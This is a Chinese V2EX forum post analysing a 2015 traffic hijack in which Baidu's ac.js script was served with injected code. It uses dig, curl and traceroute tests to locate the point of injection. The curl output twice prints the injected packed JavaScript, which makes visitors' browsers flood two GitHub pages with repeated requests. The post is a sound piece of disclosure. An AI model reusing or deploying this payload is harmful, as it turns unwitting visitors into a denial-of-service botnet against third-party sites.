先说自己的结论。分析来看,有很大把握怀疑,本次GFW劫持的是百度海外CDN回国连接,并没有直接劫持用户到CDN的链接。直接给CDN投毒,比劫持用户链接恶劣而且隐蔽得多。
坐标广东深圳,使用某JS位于peer1的VPN作为出口。VPN interface为tun0。8.8.8.0/24已默认走VPN。
测试链接为http://dup.baidustatic.com/tpl/ac.js。
百度统计国外CDN解析:
[siyanmao@siyanmao-k29 ~]$ dig dup.baidustatic.com @8.8.8.8
; <<>> DiG 9.9.2-P2 <<>> dup.baidustatic.com @8.8.8.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51040
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;dup.baidustatic.com. IN A
;; ANSWER SECTION:
dup.baidustatic.com. 2938 IN CNAME ecomcbjs.jomodns.com.
ecomcbjs.jomodns.com. 59 IN CNAME ecomcbjs.wshifen.com.
ecomcbjs.wshifen.com. 299 IN A 180.76.3.138
;; Query time: 531 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sat Apr 4 13:07:22 2015
;; MSG SIZE rcvd: 126
百度统计国内CDN地址解析:
[siyanmao@siyanmao-k29 ~]$ dig dup.baidustatic.com @114.114.114.114
; <<>> DiG 9.9.2-P2 <<>> dup.baidustatic.com @114.114.114.114
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22259
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;dup.baidustatic.com. IN A
;; ANSWER SECTION:
dup.baidustatic.com. 5030 IN CNAME ecomcbjs.jomodns.com.
ecomcbjs.jomodns.com. 30 IN A 58.215.123.49
;; Query time: 25 msec
;; SERVER: 114.114.114.114#53(114.114.114.114)
;; WHEN: Sat Apr 4 13:10:10 2015
;; MSG SIZE rcvd: 95
在国内请求国内地址,尝试若干次,没有发现劫持现象。
root@Cat_FireWall:~# curl --interface pppoe-pppoe_tel http://58.215.123.49/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 167 100 167 0 0 3036 0 --:--:-- --:--:-- --:--:-- 3092
在国内请求国外地址,发现劫持现象。
root@Cat_FireWall:~# curl --interface pppoe-pppoe_tel http://180.76.3.138/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1130 100 1130 0 0 2457 0 --:--:-- --:--:-- --:--:-- 2456
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))
在国外请求国内地址,尝试若干次,未发现劫持现象。
root@Cat_FireWall:~# curl --interface tun0 http://58.215.123.49/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 167 100 167 0 0 243 0 --:--:-- --:--:-- --:--:-- 243
在国外请求国外地址,发现劫持现象。
root@Cat_FireWall:~# curl --interface tun0 http://180.76.3.138/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1130 100 1130 0 0 1635 0 --:--:-- --:--:-- --:--:-- 1635
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))
附上traceroute结果:
国内到国内:
root@Cat_FireWall:~# traceroute -n -w 1 -i pppoe-pppoe_tel 58.215.123.49
traceroute to 58.215.123.49 (58.215.123.49), 30 hops max, 38 byte packets
1 ------------- 3.759 ms 2.109 ms 2.328 ms
2 ------------- 8.620 ms 1.946 ms 17.896 ms
3 58.60.24.33 2.590 ms 2.333 ms 2.451 ms
4 183.56.66.2 3.262 ms 3.915 ms 183.56.65.86 3.690 ms
5 202.97.47.165 26.488 ms 23.881 ms 28.291 ms
6 61.160.130.50 25.855 ms 26.168 ms 24.748 ms
7 * * *
8 * * *
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
14 * * *
15 * * *
16 * *^C
国内到国外:
root@Cat_FireWall:~# traceroute -n -w 1 -i pppoe-pppoe_tel 180.76.3.138
traceroute to 180.76.3.138 (180.76.3.138), 30 hops max, 38 byte packets
1 ------------- 3.451 ms 2.017 ms 2.162 ms
2 ------------- 1.919 ms 3.072 ms 1.432 ms
3 119.145.220.82 2.140 ms 2.300 ms 2.317 ms
4 183.56.65.78 10.582 ms 1.811 ms 183.56.65.74 2.364 ms
5 202.97.64.14 6.494 ms 202.97.64.90 6.247 ms 202.97.64.10 7.423 ms
6 202.97.33.214 9.657 ms 7.747 ms 202.97.33.202 4.956 ms
7 202.97.61.234 9.073 ms 7.286 ms 7.871 ms
8 202.97.60.214 161.911 ms 164.494 ms 165.175 ms
9 129.250.6.96 178.692 ms 173.779 ms 129.250.6.200 173.363 ms
10 129.250.3.89 225.555 ms 129.250.2.121 224.995 ms 129.250.3.89 224.500 ms
11 129.250.6.125 232.907 ms 129.250.6.115 241.194 ms 129.250.6.125 232.442 ms
12 129.250.3.11 213.466 ms 203.131.246.146 209.703 ms 129.250.3.11 213.506 ms
13 203.131.246.146 207.230 ms 211.049 ms 212.382 ms
14 * * *
15 * * *
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 *^C
国外到国内:
root@Cat_FireWall:~# traceroute -n -w 1 -i tun0 58.215.123.49
traceroute to 58.215.123.49 (58.215.123.49), 30 hops max, 38 byte packets
1 -------------- 195.947 ms 197.496 ms 197.131 ms
2 * * *
3 216.187.88.137 198.443 ms 196.670 ms 216.187.88.37 196.077 ms
4 4.53.230.5 218.506 ms 77.67.70.205 196.052 ms 201.644 ms
5 4.53.230.5 205.076 ms 218.30.53.33 197.377 ms 4.53.230.5 231.133 ms
6 4.69.152.17 210.480 ms 205.735 ms *
7 4.53.210.114 205.601 ms 4.53.210.110 204.958 ms 202.97.50.1 335.257 ms
8 202.97.49.21 208.979 ms 202.97.35.105 363.427 ms 392.479 ms
9 202.97.49.21 207.914 ms 202.97.33.29 343.229 ms 202.97.49.21 207.652 ms
10 202.97.50.109 370.422 ms 202.97.35.105 373.707 ms 202.97.50.109 370.264 ms
11 202.97.33.29 348.333 ms 347.784 ms *
12 202.97.39.94 350.945 ms 58.215.128.78 356.080 ms *
13 202.97.39.94 349.851 ms * 352.852 ms
14 202.102.19.146 382.604 ms * *
15 * * *
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26^C
国外到国外:
root@Cat_FireWall:~# traceroute -n -w 1 -i tun0 180.76.3.138
traceroute to 180.76.3.138 (180.76.3.138), 30 hops max, 38 byte packets
1 ------------- 183.651 ms 184.821 ms 184.487 ms
2 * * *
3 216.187.88.37 183.902 ms * 216.187.88.137 185.452 ms
4 216.187.88.61 185.633 ms 216.187.124.120 186.372 ms 206.72.210.114 186.115 ms
5 216.187.88.57 188.105 ms 118.143.224.1 414.602 ms 216.187.124.120 185.231 ms
6 118.143.224.9 419.347 ms 118.143.238.20 421.086 ms 118.143.224.9 421.095 ms
7 218.189.31.102 422.702 ms 118.143.224.25 429.397 ms 118.143.238.20 415.053 ms
8 * 218.189.5.20 419.124 ms 218.189.31.102 416.379 ms
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
14 * * *
15 * * *
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * *^C
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.